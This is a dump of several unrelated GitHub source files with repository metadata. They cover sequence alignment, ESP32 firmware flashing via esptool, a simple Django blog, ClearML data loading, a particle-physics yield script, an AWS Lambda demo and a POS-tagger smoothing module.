S[i,j] assigned with 0 if negative.\n\t'''\n\trows, cols = len(seq_x), len(seq_y)\n\n\t#initialize alignment\n\t#first row and first column not used!\n\talignment = [[0 for _ in range(cols + 1)] for _ in range(rows + 1)]\n\tfor idx_i in range(1, rows + 1):\n\t\talignment[idx_i][0] = _clip(alignment[idx_i - 1][0] + scoring_matrix[seq_x[idx_i - 1]]['-'], global_flag)\n\n\tfor idx_j in range(1, cols + 1):\n\t\talignment[0][idx_j] = _clip(alignment[0][idx_j - 1] + scoring_matrix['-'][seq_y[idx_j - 1]], global_flag)\n\n\tfor idx_i in range(1, rows + 1):\n\t\tfor idx_j in range(1, cols + 1):\n\t\t\talignment[idx_i][idx_j] = max([\n\t\t\t\t_clip(alignment[idx_i - 1][idx_j - 1] + scoring_matrix[seq_x[idx_i - 1]][seq_y[idx_j - 1]], global_flag),\n\t\t\t\t_clip(alignment[idx_i - 1][idx_j] + scoring_matrix[seq_x[idx_i - 1]]['-'], global_flag),\n\t\t\t\t_clip(alignment[idx_i][idx_j - 1] + scoring_matrix['-'][seq_y[idx_j - 1]], global_flag)\n\t\t\t\t])\n\n\treturn alignment\n\ndef compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\t'''\n\t@input:\n\tseq_x, seq_y: whose elements share a common alphabet with the scoring matirx;\n\tscoring matrix: output of func build_scoring_matrix;\n\talignment matrix: output of func compute_global_alignment;\n\n\t@output: tuple of the form (score, align_x, align_y)\n\twhere score is the score of the global alignment,\n\talign_x and align_y should have the same length and may include \n\tthe padding characters '-';\n\t'''\n\treturn compute_alignment(seq_x, seq_y,\n\t\t\t\t\t\t\t scoring_matrix,\n\t\t\t\t\t\t\t alignment_matrix,\n\t\t\t\t\t\t\t global_flag = True)\n\ndef compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\t'''\n\tSee Q13 of Homework.\n\tStart the traceback from the entry in S that has the maximum value over the entire matrix \n\tand trace backwards using exactly the same technique as in ComputeGlobalAlignment. \n\tStop the traceback when the first entry with value 0 is encountered. 
\n\tIf the local alignment matrix has more than one entry that has the maximum value, \n\tany entry with maximum value may be used as the starting entry.\n\t'''\n\treturn compute_alignment(seq_x, seq_y,\n\t\t\t\t\t\t\t scoring_matrix,\n\t\t\t\t\t\t\t alignment_matrix,\n\t\t\t\t\t\t\t global_flag = False)\n\n\ndef compute_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix, global_flag):\n\t'''\n\tUniversal function for computing global and local alignments\n\t'''\n\tidx_i, idx_j = len(seq_x), len(seq_y)\n\tif not global_flag:\n\t\t# i.e. global_flag == False, which means the local case.\n\t\tidx_i, idx_j = max_index(alignment_matrix, len(seq_x), len(seq_y))\n\tbest_score = alignment_matrix[idx_i][idx_j]\n\tnew_xs, new_ys = '', ''\n\n\tdef cond_global(idx_i, idx_j):\n\t\t'''\n\t\tCondition for while loops in global mode\n\t\t'''\n\t\tif idx_j is None:\n\t\t\treturn idx_i != 0\n\t\telif idx_i is None:\n\t\t\treturn idx_j != 0\n\t\telse:\n\t\t\treturn idx_i != 0 and idx_j != 0\n\n\tdef cond_local(idx_i, idx_j):\n\t\t'''\n\t\tCondition for while loops in local mode\n\t\t'''\n\t\treturn alignment_matrix[idx_i][idx_j] != 0\n\n\tcond = cond_global if global_flag else cond_local\n\n\twhile cond(idx_i, idx_j):\n\t\tif alignment_matrix[idx_i][idx_j] == _clip(alignment_matrix[idx_i - 1][idx_j - 1] + scoring_matrix[seq_x[idx_i - 1]][seq_y[idx_j - 1]], global_flag):\n\t\t\tnew_xs = seq_x[idx_i - 1] + new_xs\n\t\t\tnew_ys = seq_y[idx_j - 1] + new_ys\n\t\t\tidx_i, idx_j = idx_i - 1, idx_j - 1\n\t\telif alignment_matrix[idx_i][idx_j] == _clip(alignment_matrix[idx_i - 1][idx_j] + scoring_matrix[seq_x[idx_i - 1]]['-'], global_flag):\n\t\t\tnew_xs, new_ys = seq_x[idx_i - 1] + new_xs, '-' + new_ys\n\t\t\tidx_i -= 1\n\t\telse:\n\t\t\tnew_xs, new_ys = '-' + new_xs, seq_y[idx_j - 1] + new_ys\n\t\t\tidx_j -= 1\n\n\twhile cond(idx_i, None if global_flag else idx_j):\n\t\tnew_xs, new_ys = seq_x[idx_i - 1] + new_xs, '-' + new_ys\n\t\tidx_i -= 1\n\n\twhile cond(None if global_flag else 
idx_i, idx_j):\n\t\tnew_xs, new_ys = '-' + new_xs, seq_y[idx_j - 1] + new_ys \n\t\tidx_j -= 1\n\n\treturn best_score, new_xs, new_ys\n\n\ndef max_index(alignment, rows, cols):\n\t'''\n\tPosition of max item in the matrix\n\t'''\n\tmax_i, max_j = 0, 0\n\tfor idx_i in range(rows + 1):\n\t\tfor idx_j in range(cols + 1):\n\t\t\tif alignment[idx_i][idx_j] > alignment[max_i][max_j]:\n\t\t\t\tmax_i, max_j = idx_i , idx_j \n\n\treturn max_i, max_j\n\n\n\n","repo_name":"Yueleng/IIPP","sub_path":"AT_Week7And8/Homework/project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19492338306","text":"import os\nimport re\nimport time\nfrom typing import Callable, List, NoReturn, Optional\n\nfrom gazoo_device import decorators\nfrom gazoo_device import errors\nfrom gazoo_device import gdm_logger\nfrom gazoo_device.capabilities.interfaces import flash_build_base\nfrom gazoo_device.capabilities.interfaces import switchboard_base\n\n\nlogger = gdm_logger.get_logger()\n\ntry:\n # pylint: disable=g-import-not-at-top\n import esptool\n _ESPTOOL_AVAILABLE = True\nexcept ImportError:\n _ESPTOOL_AVAILABLE = False\n\n_DEFAULT_BOOT_UP_TIMEOUT_SECONDS = 30\n_SWITCHBOARD_CAPABILITY = 'switchboard'\n\n# Default flash argumnets used with esptool. 
For details refer to\n# https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/index.html#esptool-py\n_BAUDRATE = 460800\n_BEFORE_FLASH = 'default_reset'\n_AFTER_FLASH = 'hard_reset'\n_FLASH_MODE = 'keep'\n_FLASH_FREQ = 'keep'\n_FLASH_SIZE = 'detect'\n_APPLICATION_OFFSET = 0x20000\n_PARTITION_OFFSET = 0x8000\n_BOOTLOADER_OFFSET = 0x1000\n\n\nclass FlashBuildEsptool(flash_build_base.FlashBuildBase):\n \"\"\"Esptool implementation of flash_build capability.\"\"\"\n\n def __init__(\n self,\n device_name: str,\n chip_type: str,\n serial_port: str,\n switchboard: Optional[switchboard_base.SwitchboardBase] = None,\n wait_for_bootup_complete_fn: Optional[Callable[[int], None]] = None,\n reset_endpoints_fn: Optional[Callable[[str], None]] = None,\n boot_up_time: int = _DEFAULT_BOOT_UP_TIMEOUT_SECONDS,\n baud: int = _BAUDRATE,\n before: str = _BEFORE_FLASH,\n after: str = _AFTER_FLASH,\n flash_mode: str = _FLASH_MODE,\n flash_freq: str = _FLASH_FREQ,\n flash_size: str = _FLASH_SIZE,\n application_offset: int = _APPLICATION_OFFSET,\n partition_offset: int = _PARTITION_OFFSET,\n bootloader_offset: int = _BOOTLOADER_OFFSET):\n \"\"\"Initializes an instance of the FlashBuildEsptool capability.\n\n For details related to before/after flash arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/advanced-options.html#reset-modes\n For details related to flash mode, ferq, size arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/flash-modes.html\n\n Args:\n device_name: Device name used for logging.\n chip_type: The target device's chip type.\n serial_port: Device serial port.\n switchboard: A Switchboard capability instance if the device supports it.\n wait_for_bootup_complete_fn: The wait_for_bootup_complete method. This\n method will be called after flashing is complete. 
If not specified,\n time.sleep(boot_up_time) will be used to wait for boot up.\n reset_endpoints_fn: Method to reset matter_endpoint capability.\n This method will be called after flashing is completed.\n boot_up_time: The time to wait for boot up sequence to complete.\n baud: Baudrate for device serial communication.\n before: Action to perform before flashing.\n after: Action to perform after flashing is complete.\n flash_mode: Mode for flashing.\n flash_freq: Clock frequency for SPI flash interactions.\n flash_size: Size of the SPI flash to use.\n application_offset: Memory offset in hex format to flash application\n binary.\n partition_offset: Memory offset in hex format to flash partition-table\n binary.\n bootloader_offset: Memory offset in hex format to flash bootloader binary.\n\n Raises:\n DependencyUnavailableError: If esptool is not installed.\n ValueError: If chip_type is not supported.\n \"\"\"\n if not _ESPTOOL_AVAILABLE:\n raise errors.DependencyUnavailableError(\n '\"esptool\" is not installed. \"esptool\" is not included due to '\n 'licensing restrictions. 
To enable flashing for this device type, '\n 'install \"esptool\": \"pip install esptool>=3.2\".')\n\n if chip_type not in esptool.CHIP_LIST: # pytype: disable=module-attr\n raise ValueError(f'Chip {chip_type} not supported by esptool.')\n\n super().__init__(device_name=device_name)\n self._serial_port = serial_port\n self._chip_type = chip_type\n self._flash_args = {\n 'baud': baud,\n 'before': before,\n 'after': after,\n 'flash_mode': flash_mode,\n 'flash_freq': flash_freq,\n 'flash_size': flash_size,\n 'application_offset': application_offset,\n 'partition_offset': partition_offset,\n 'bootloader_offset': bootloader_offset,\n }\n self._switchboard = switchboard\n self._wait_for_bootup_complete_fn = wait_for_bootup_complete_fn\n self._reset_endpoints_fn = reset_endpoints_fn\n self._boot_up_time = boot_up_time\n\n @decorators.CapabilityLogDecorator(logger)\n def _get_write_command_arguments(self, erase: bool = False) -> List[str]:\n \"\"\"Helper function to get write command arguments.\n\n For details please refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/scripting.html#embedding-into-custom-scripts\n\n Args:\n erase: True to use erase-all option when flashing, else False.\n\n Returns:\n Arguments required for flashing.\n \"\"\"\n basic_command_args = [\n '--port', self._serial_port, '--baud', self._flash_args['baud'],\n '--chip', self._chip_type, '--before', self._flash_args['before'],\n '--after', self._flash_args['after']\n ]\n write_command_args = [\n 'write_flash', '--flash_freq', self._flash_args['flash_freq'],\n '--flash_mode', self._flash_args['flash_mode'], '--flash_size',\n self._flash_args['flash_size'], '--compress'\n ]\n if erase:\n write_command_args.append('--erase-all')\n return basic_command_args + write_command_args\n\n @decorators.CapabilityLogDecorator(logger)\n def _verify_file(self, image_path: str, ends_with: str = '.bin') -> None:\n \"\"\"Helper function to validate image file.\n\n Args:\n image_path: Path to 
the image file.\n ends_with: Expected image suffix. E.g. bootloader files are expected to\n have suffix 'bootloader.bin'.\n\n Raises:\n ValueError: If the image file suffix does not end with 'ends_with' arg.\n FileNotFoundError: If image file does not exist.\n \"\"\"\n if not image_path.endswith(ends_with):\n raise ValueError(f'Only {ends_with} type file can be flashed.')\n if not os.path.exists(image_path):\n raise FileNotFoundError(f'Firmware image {image_path} does not exist.')\n\n @decorators.CapabilityLogDecorator(logger)\n def flash_device(self,\n list_of_files: List[str],\n expected_version: Optional[str] = None,\n expected_build_type: Optional[str] = None,\n verify_flash: bool = True,\n method: Optional[str] = None,\n erase_flash: bool = False) -> None:\n \"\"\"Flashes the firmware image (.bin file) on the device.\n\n Args:\n list_of_files: List of image files on local host in following order\n [build_file_name, bootloader_file_name, partition_table_file_name].\n expected_version: Not used.\n expected_build_type: Not used.\n verify_flash: Not used. 'esptool' always verifies flashed image.\n method: Not used.\n erase_flash: True if everything needs to be erased before flashing.\n\n Raises:\n ValueError: If list of files is empty, all values are None or list length\n is more than 3.\n \"\"\"\n del expected_version, expected_build_type, verify_flash, method # Unused.\n if len(list_of_files) != 3:\n raise ValueError('Only application, bootloader, partition table files can'\n ' be flashed via esptool. 
If only flashing one type'\n ' please set others to None.')\n if not any(list_of_files):\n raise ValueError('No firmware files provided to flash the device.')\n\n command = self._get_write_command_arguments(erase=erase_flash)\n\n offset_types = [\n 'application_offset', 'bootloader_offset', 'partition_offset'\n ]\n ends_with = ['.bin', 'bootloader.bin', 'partition-table.bin']\n for image, offset_type, ends_with in zip(list_of_files, offset_types,\n ends_with):\n if image is not None:\n self._verify_file(image, ends_with)\n command += [self._flash_args[offset_type], image]\n\n command = list(map(str, command))\n\n # Close serial connection from GDM to avoid conflict with esptool flashing.\n if self._switchboard is not None:\n self._switchboard.close_all_transports()\n\n logger.info(f'Executing esptool command: {command}')\n esptool.main(command) # pytype: disable=module-attr\n\n if self._switchboard is not None:\n self._switchboard.open_all_transports()\n\n if self._flash_args['after'] == _AFTER_FLASH:\n if self._wait_for_bootup_complete_fn:\n self._wait_for_bootup_complete_fn(self._boot_up_time)\n else:\n time.sleep(self._boot_up_time)\n\n # For Matter device classes, we'll need to reset the Matter endpoint mapping\n # as the supported endpoints might change after flashing a new build.\n if self._reset_endpoints_fn is not None:\n self._reset_endpoints_fn()\n\n @decorators.CapabilityLogDecorator(logger)\n def extract_build_info(self, *args, **kwargs) -> NoReturn:\n \"\"\"Converts the provided build arguments into info about the build.\"\"\"\n raise NotImplementedError(\n 'extract_build_info is not available in flash_build_esptool for now.')\n\n @decorators.CapabilityLogDecorator(logger)\n def upgrade(\n self,\n build_file: Optional[str] = None,\n partition_file: Optional[str] = None,\n bootloader_file: Optional[str] = None,\n erase_flash: bool = False,\n baud: Optional[int] = None,\n before: Optional[str] = None,\n after: Optional[str] = None,\n flash_mode: 
Optional[str] = None,\n flash_freq: Optional[str] = None,\n flash_size: Optional[str] = None,\n application_offset: Optional[int] = None,\n partition_offset: Optional[int] = None,\n bootloader_offset: Optional[int] = None,\n flash_settings_file: Optional[str] = None,\n ) -> None:\n \"\"\"Upgrade the device based on the provided build arguments.\n\n For details related to before/after flash arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/advanced-options.html#reset-modes\n\n For details related to flash mode, ferq, size arguments refer to\n https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/flash-modes.html#\n\n Each entry in the partition table file has a name (label), type\n (app, data, or something else), subtype and the offset in flash where the\n partition is loaded. For details refer to\n https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-guides/partition-tables.html#partition-tables\n\n A Bootloader selects and loads application image into RAM. To update the\n device bootloder image please specify a bootloader.bin generated when\n compiling a esp32 project. 
For details refer to\n https://docs.espressif.com/projects/esp-idf/en/latest/esp32/api-guides/bootloader.html#bootloader\n\n Args:\n build_file: Local path to the application file.\n partition_file: Local path to the partition table file.\n bootloader_file: Local path to the bootloader file.\n erase_flash: True if everything needs to be erased before flashing.\n baud: Baudrate for device serial communication.\n before: Action to perform before flashing.\n after: Action to perform after flashing is complete.\n flash_mode: Mode for flashing.\n flash_freq: Clock frequency for SPI flash interactions.\n flash_size: Size of the SPI flash to use.\n application_offset: Memory offset in hex format to flash application\n binary.\n partition_offset: Memory offset in hex format to flash partition-table\n binary.\n bootloader_offset: Memory offset in hex format to flash bootloader binary.\n flash_settings_file: *.flash.py present when using a matter sample app\n from matter-automation-project. This file will be used to read default\n flash settings. 
These can be overridden if user explicitly passes them as\n an argument.\n \"\"\"\n build_args = {\n name: value for name, value in locals().items() if name not in ['self']\n }\n flash_args_keys = self._flash_args.keys()\n\n # Update flash arguments from *.flash.py\n if flash_settings_file:\n with open(flash_settings_file) as settings_file:\n settings = settings_file.read()\n # Regex for flash arguments such as `'flash_freq': '30m',`.\n pattern = re.compile(r\"'(\\w+)': '(\\w+)',\", re.MULTILINE | re.ASCII)\n self._flash_args.update({\n match.group(1): match.group(2)\n for match in re.finditer(pattern, settings)\n if match.group(1) in flash_args_keys and match.group(2) is not None\n })\n\n # Override flash settings with user provided arguments.\n self._flash_args.update({\n build_args_key: build_args_value\n for build_args_key, build_args_value in build_args.items()\n if build_args_key in flash_args_keys and build_args_value is not None\n })\n\n self.flash_device(\n list_of_files=[build_file, bootloader_file, partition_file],\n erase_flash=erase_flash)\n\n","repo_name":"google/gazoo-device","sub_path":"gazoo_device/capabilities/flash_build_esptool.py","file_name":"flash_build_esptool.py","file_ext":"py","file_size_in_byte":13314,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"44"} +{"seq_id":"38999341272","text":"from .models import Post, Comment, UserSettings\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import PostForm, CommentForm, UserSettingsForm\ndef index(request):\n posts = Post.objects.all().order_by('-created_at')\n return render(request, 'index.html', {'posts': posts})\n\ndef post_detail(request, post_id):\n post = Post.objects.get(id=post_id)\n return render(request, 'post_detail.html', {'post': post})\n\ndef register(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if 
form.is_valid():\n form.save()\n return redirect('index')\n else:\n form = UserCreationForm()\n return render(request, 'registration/register.html', {'form': form})\n\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('post_detail', post_id=post.id)\n else:\n form = PostForm()\n return render(request, 'blogapp/post_edit.html', {'form': form})\n\ndef post_edit(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('post_detail', post_id=post.id)\n else:\n form = PostForm(instance=post)\n return render(request, 'blogapp/post_edit.html', {'form': form})\n\ndef post_delete(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n post.delete()\n return redirect('index')\n\ndef add_comment(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.author = request.user\n comment.save()\n return redirect('post_detail', post_id=post.id)\n else:\n form = CommentForm()\n return render(request, 'blogapp/add_comment.html', {'form': form})\n\ndef delete_comment(request, comment_id):\n comment = get_object_or_404(Comment, id=comment_id)\n post_id = comment.post.id\n comment.delete()\n return redirect('post_detail', post_id=post_id)\n\ndef search(request):\n query = request.GET.get('q')\n results = Post.objects.filter(title__icontains=query)\n return render(request, 'search.html', {'results': results})\n\ndef profile(request, user_id):\n user = User.objects.get(id=user_id)\n posts = Post.objects.filter(author=user)\n return render(request, 'profile.html', 
{'user': user, 'posts': posts})\n\ndef manage_posts(request, user_id):\n user = User.objects.get(id=user_id)\n posts = Post.objects.filter(author=user)\n return render(request, 'manage_posts.html', {'posts': posts})\n\ndef settings(request, user_id):\n user = User.objects.get(id=user_id)\n settings = UserSettings.objects.get_or_create(user=user)[0]\n if request.method == \"POST\":\n form = UserSettingsForm(request.POST, instance=settings)\n if form.is_valid():\n form.save()\n return redirect('profile', user_id=user.id)\n else:\n form = UserSettingsForm(instance=settings)\n return render(request, 'settings.html', {'form': form})","repo_name":"lsaac1208/djangoProject","sub_path":"blogproject/blogapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42801815076","text":"import pandas as pd\nfrom clearml import Dataset\nfrom sklearn.model_selection import train_test_split\n\n\ndef prepare_data(dataset_id=None, dataset_alias=None, dataset_name=None, dataset_project=None):\n # Read the data\n data_path = Dataset.get(\n dataset_id=dataset_id,\n alias=dataset_alias,\n dataset_name=dataset_name,\n dataset_project=dataset_project,\n ).get_local_copy()\n data = pd.read_csv(f\"{data_path}/sample.csv\", sep=\";\").fillna(0).astype(float)\n\n X_train, X_test, y_train, y_test = train_test_split(\n data.drop(columns=[\"target\"]), data[\"target\"], test_size=0.33, random_state=42\n )\n\n return X_train, y_train, X_test, y_test\n","repo_name":"kryvokhyzha/experiment-tracking-clearml","sub_path":"src/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74514494851","text":"#!/usr/bin/env python\nimport argparse,ROOT,os,math,pprint\nparser = argparse.ArgumentParser(add_help=False, description='make signal contamination 
plots')\nparser.add_argument('inFile')\nargs = parser.parse_args()\nlumi = 35\nmjCut = 0.8\nbDict = {'4jVRb0':(128.5),\n '4jVRb1':(46.5),\n '4jSRb0':(299.1),\n '4jSRb1':(104.3),\n '5jVRb0':(7.5),\n '5jVRb1':(3.0),\n '5jSRb0':(16.4),\n '5jSRb1':(7.6)}\nyieldDict = {}\nf = ROOT.TFile.Open(args.inFile)\nt = f.Get('miniTree')\nnEntries = t.GetEntries()\n\nfor entry in range(nEntries):\n# if entry % 10000 == 0:\n# print 'processing entry %i' % entry\n t.GetEntry(entry)\n dsid = t.mcChannelNumber\n if not dsid in yieldDict:\n yieldDict[dsid] = {'4jVRb0':0.0,\n '4jVRb1':0.0,\n '4jSRb0':0.0,\n '4jSRb1':0.0,\n '5jVRb0':0.0,\n '5jVRb1':0.0,\n '5jSRb0':0.0,\n '5jSRb1':0.0}\n if t.MJ < mjCut:\n continue\n if t.njet == 4:\n if t.dEta > 1.0:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['4jVRb0'] += t.weight*lumi / math.sqrt(bDict['4jVRb0'])\n else:\n yieldDict[dsid]['4jVRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['4jVRb1'])\n else:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['4jSRb0'] += t.weight*lumi / math.sqrt(bDict['4jSRb0'])\n else:\n yieldDict[dsid]['4jSRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['4jSRb1'])\n elif t.njet >= 5:\n if t.dEta > 1.0:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['5jVRb0'] += t.weight*lumi / math.sqrt(bDict['5jVRb0'])\n else:\n yieldDict[dsid]['5jVRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['5jVRb1'])\n else:\n if t.nbjet_Fix70 == 0:\n yieldDict[dsid]['5jSRb0'] += t.weight*lumi / math.sqrt(bDict['5jSRb0'])\n else:\n yieldDict[dsid]['5jSRb1'] += t.weight*t.bSF_70*lumi / math.sqrt(bDict['5jSRb1'])\npprint.pprint(yieldDict)\n","repo_name":"btamadio/MJBkg","sub_path":"scripts/makeSigContamDict.py","file_name":"makeSigContamDict.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"35014041805","text":"#!/usr/bin/env python\n\n'''\nhttps://gist.github.com/liladas/94a9d6510ec55188baa20481c3b7a225\n\n# open the aws console for this 
function\nopen https://us-east-2.console.aws.amazon.com/lambda/home?region=us-east-2#/functions/hello_upper?tab=configuration\n\n# do an uppercase (default) operation\naws lambda invoke --function-name hello_upper --payload '{ \"word\": \"example\" }' response.json;\ncat response.json;\n\n# do a lowercase operation\naws lambda invoke --function-name hello_upper --payload '{ \"word\": \"ALL_CAPS\", \"operation\": \"lower\" }' response.json;\ncat response.json;\n\n# do an invalid request\naws lambda invoke --function-name hello_upper --payload '{ \"wordx\": \"ALL_CAPS\", \"operation\": \"lower\" }' response.json;\n\n# print some logs using CLI (this isn't a very useful thing...)\naws logs filter-log-events --log-group-name /aws/lambda/hello_upper --filter-pattern \"lower\" | jq .events[].message | sed 's/\"//g'\n\n# print some logs, no filter\naws logs filter-log-events --log-group-name /aws/lambda/hello_upper | jq .events[].message | sed 's/\"//g'\n\n# show cloudwatch\nopen https://us-east-2.console.aws.amazon.com/cloudwatch/home?region=us-east-2#logStream:group=/aws/lambda/hello_upper;streamFilter=typeLogStreamPrefix\n\n'''\n\nimport json\nimport time\n\n\ndef uppercase(string):\n ''' upper the letters in the string '''\n return string.upper()\n\n\ndef lowercase(string):\n ''' lowercase the letters in the string '''\n return string.lower()\n\n\n# function mapping\nstring_function_mapping = {\n 'lower': lowercase,\n 'upper': uppercase\n}\n\n\ndef lambda_handler(event, context):\n # print the event object\n print(json.dumps(event, indent=2, sort_keys=True))\n\n # print some of the context object items\n print(\"Log stream name:\", context.log_stream_name)\n print(\"Log group name:\", context.log_group_name)\n print(\"Request ID:\",context.aws_request_id)\n print(\"Mem. 
limits(MB):\", context.memory_limit_in_mb)\n\n # Code will execute quickly, so we add a 1 second intentional delay so you can see that in time remaining value.\n time.sleep(1)\n print(\"Time remaining (MS):\", context.get_remaining_time_in_millis())\n\n string_operation = event.get('operation', 'upper')\n word = event.get('word', None)\n\n if not word:\n print(\"No word specified...\")\n return dict(word=None, error=\"no word specified\")\n\n new_word = string_function_mapping[string_operation](word)\n\n print(\"%s ==> %s ==> %s\" % (word, string_operation, new_word ))\n\n return dict(word=word, new_word=new_word, operation=string_operation)\n","repo_name":"liladas/serverless_demo","sub_path":"hello_upper/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12455790403","text":"import numpy as np\n\n# calcola la probabilità che un termine sconosciuto abbia un certo pos in base\n# all'analisi fatta sul dev-set file\ndef statisticsOnDevSet(fileName, pos):\n with open(fileName, 'r', encoding='utf-8') as file:\n lines = file.readlines()\n words={}\n deletedWords=[]\n statistics = np.zeros(len(pos))\n for line in lines:\n wordsInLine = line.split()\n # i seguenti due controlli servono per capire quando analizzare il corpus per il pos\n # Se la riga incomincia con '#' significa che è iniziato il corpus successivo\n # e c'è bisogno di resettare il tag precedente\n if line.startswith('1'):\n analyze = True\n elif line.startswith('#'):\n analyze = False\n # analizziamo la riga e segniamo l'occorrenza del pos\n if analyze is True:\n if (wordsInLine != []):\n w = wordsInLine[1].lower()\n if w not in words.keys() and w not in deletedWords:\n words[w] = wordsInLine[3]\n elif w in words.keys():\n words.pop(w,None)\n deletedWords.append(w)\n\n for index,p in enumerate(pos):\n statistics[index] = list(words.values()).count(p)\n\n 
return statistics/len(words.keys())\n\n# funzione per lo smoothing che fa uso di diverse metodologie per cercare\n# di migliorare i risultati\ndef getUnknownTag(word, language, pos):\n posWord = np.zeros(len(pos))\n nounAdj = []\n adj = []\n verb = []\n noun = []\n adverb = []\n if language == \"Latino\":\n nounAdj = ['aria', 'arium', 'arius', 'atus', 'cola', 'colum', 'dicus', 'ellus', 'genus', 'gena', 'gen',\n 'mentum', 'or', 'tas', 'tus', 'ter', 'tio', 'tor', 'trix', 'trina', 'tudo', 'unculus', 'ura']\n adj = ['aceus', 'alis', 'andus', 'endus', 'iendus', 'ans', 'antis', 'ens', 'entis', 'iens', 'ientis', 'anus',\n 'aticus', 'atus', 'bilis', 'bundus', 'ellus', 'ensis', 'esimus', 'eus', 'ilis', 'inus', 'ior', 'ius',\n 'issimis', 'imus', 'osus', 'torius', 'timus', 'ulus']\n verb = ['esco', 'ico', 'ito', 'sco', 'so', 'sso', 'to', 'urio']\n\n if language == \"Greco\":\n noun = ['της', 'τής', 'ίτης', 'ώτης']\n adj = ['ῐος', 'εῖος']\n adverb = ['ως']\n verb = ['ίζω']\n\n for n in noun:\n if word.endswith(n):\n posWord[pos.index(\"NOUN\")] = 1\n return posWord\n\n for adv in adverb:\n if word.endswith(adv):\n posWord[pos.index(\"ADV\")] = 1\n return posWord\n\n for na in nounAdj:\n if word.endswith(na):\n posWord[pos.index(\"NOUN\")] = 0.5\n posWord[pos.index(\"ADJ\")] = 0.5\n return posWord\n\n for a in adj:\n if word.endswith(a):\n posWord[pos.index(\"ADJ\")] = 1\n return posWord\n\n for v in verb:\n if word.endswith(v):\n posWord[pos.index(\"VERB\")] = 1\n return posWord\n\n posWord[np.where(pos == \"NOUN\")] = 1\n return posWord\n\n# smoothingType = 0: unknown -> NOUN\n# smoothingType = 1: unknown -> NOUND/VERB\n# smoothingType = 2: unknown -> distribution on pos\n# smoothingType = 3: unknown -> distribution on dev set\ndef smoothing(pos, type, devFileName) :\n smoothingVector = np.zeros(len(pos))\n if type == 0:\n smoothingVector[pos.index(\"NOUN\")] = 1\n elif type == 1:\n smoothingVector[pos.index(\"NOUN\")] = 0.5\n smoothingVector[pos.index(\"VERB\")] = 0.5\n elif 
type == 2:\n smoothingVector = np.ones(len(pos))*(1/len(pos))\n elif type == 3:\n smoothingVector = statisticsOnDevSet(devFileName, pos)\n return smoothingVector","repo_name":"TLN2021/PosTagger","sub_path":"PostaggerExercise/Smoothing.py","file_name":"Smoothing.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38970784327","text":"'''\nYou are given a tree and you need to do the level order traversal on this tree.\nLevel order traversal of a tree is breadth-first traversal for the tree.\n\nLevel order traversal of above tree is 1 2 3 4 5\n\nInput:\nFirst line of input contains the number of test cases T. For each test case, there will be only a single line of input which is a string representing the tree as described below: \n\n The values in the string are in the order of level order traversal of the tree where, numbers denotes node values, and a character “N” denotes NULL child.\n\n For example:\n\n For the above tree, the string will be: 1 2 3 N N 4 6 N 5 N N 7 N\n\nOutput:\nThe function should print the level order traversal of the tree as specified in the problem statement.\n\nYour Task:\nYou don't have to take any input. 
